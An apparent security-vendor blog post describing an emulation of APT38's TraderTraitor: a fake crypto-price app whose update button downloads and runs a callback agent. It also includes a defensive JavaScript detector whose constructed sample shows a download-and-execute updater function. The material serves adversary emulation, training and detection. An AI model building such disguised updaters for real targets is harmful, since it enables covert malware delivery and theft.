TTP Tuesday: APT38 CryptoSpy
We are hot on the heels of last week’s chain that replicated WannaCry. This week we are looking at APT38’s crypto attacks. You can replicate many things, but replicating an entire blockchain seemed a little extreme, so this week’s chain concentrates on how initial access was gained, according to cisa.gov.
Anytime I see a way for me to write something custom, I like to take advantage of the situation. So just because this chain might not have a lot of TTPs, it doesn’t mean there isn’t a lot going on in the background. According to CISA, the government refers to the malware used by APT38 in these attacks as “TraderTraitor”. The malware is an Electron-based Node.js application, like Operator, just minus the malware part 😜.
Our version is nothing fancy, just an application that looks like it is giving you the most recent prices for Bitcoin and Ethereum, then asks if you would like to update. This is done to fit the next part of the CISA report: “Within the code is a function that purports to be an update, with a name such as UpdateCheckSync(), that downloads and executes a malicious payload”. In our case, the malicious payload is a pneuma agent, which gets downloaded and launched once you click the “Update” button.
The malware will check for a file called “config.json” in the same directory as the binary. If a “config.json” file is not found, the malware will fall back to parsing its binary name (similar to the technique used in the Goldilocks chain). It then uses that data to download pneuma from a Redirector or your Operator instance and attempts to connect back to that same IP (to keep complexity at a minimum, we are using Operator’s default ports).
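For defenders reviewing an unpacked Electron app, here is a static heuristic for the pattern CISA describes above: an update-named function whose body both downloads and executes. This is an added example, not code from Prelude or the CryptoSpy binary; `findSuspectUpdaters`, the sample source and its hosts and paths are constructed for illustration.

```javascript
// Static triage heuristic for unpacked Electron app sources (added example).
// Flags functions named like an updater whose body both fetches remote
// content and launches a process. Brace matching ignores strings/comments,
// so treat hits as leads for manual review, not verdicts.
const NET = /\b(?:https?\.(?:get|request)|fetch|axios(?:\.\w+)?)\s*\(/;
const WRITE = /\b(?:writeFile|writeFileSync|createWriteStream)\s*\(/;
const EXEC = /\b(?:exec|execSync|execFile|execFileSync|spawn|spawnSync)\s*\(/;
// Matches `function fooUpdate(...) {`, `fooUpdate = (...) => {`, `fooUpdate: function (...) {`
const DECL = /(?:function\s+(\w*update\w*)\s*\([^)]*\)|(\w*update\w*)\s*[:=]\s*(?:async\s*)?(?:function\s*)?\([^)]*\)\s*(?:=>)?)\s*\{/gi;

// Return the source from the brace at openIdx through its matching close.
function bodyAt(src, openIdx) {
  let depth = 0;
  for (let i = openIdx; i < src.length; i++) {
    if (src[i] === '{') depth++;
    else if (src[i] === '}' && --depth === 0) return src.slice(openIdx, i + 1);
  }
  return src.slice(openIdx); // unbalanced input: scan the remainder
}

function findSuspectUpdaters(src) {
  const hits = [];
  DECL.lastIndex = 0;
  for (let m; (m = DECL.exec(src)) !== null; ) {
    const body = bodyAt(src, DECL.lastIndex - 1);
    const traits = { network: NET.test(body), write: WRITE.test(body), exec: EXEC.test(body) };
    if (traits.network && traits.exec) hits.push({ name: m[1] || m[2], ...traits });
  }
  return hits;
}

// Constructed sample source; hosts and paths are placeholders.
const SAMPLE = `
function refreshPrices(cb) {
  https.get('https://prices.example/api', res => cb(res));
}
function UpdateCheckSync(host) {
  const out = fs.createWriteStream('/tmp/update.bin');
  https.get('https://' + host + '/payload', res => {
    res.pipe(out).on('finish', () => execFile('/tmp/update.bin'));
  });
}
const updateLabel = (el) => { el.textContent = 'Up to date'; };
`;

console.log(findSuspectUpdaters(SAMPLE));
```

Only `UpdateCheckSync` is reported: the price refresher has network access but no process launch, and `updateLabel` has neither.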
Some new techniques in Operator
The final two TTPs use some less commonly seen techniques in Operator. After hosting the link to the CryptoSpy binary, we immediately start asking Operator if our expected CryptoSpy (pneuma) agent has called back successfully. When the CryptoSpy agent calls back in, the last TTP will then queue an identification TTP to check the username and groups of the user. These TTPs will be released in a more generic form so they can be easily added to your own chains, letting you specify the name of the expected agent and the ID of the TTP you would like to queue.
Check it out on the Prelude chains website.
Feeling a bit more adventurous?
The malware’s update function is named the same as in the CISA report. Try throwing it in a reverse engineering tool (like Ghidra) to see if you can follow the information flow! Everything in the binary should be pretty straightforward and might give you the opportunity to get your feet wet with some basic reverse engineering.
A few questions you might want to try and answer are:
How does the price update?
Can you find the two functions that are used to identify the callback IP?
What are some of the strings embedded in the binary?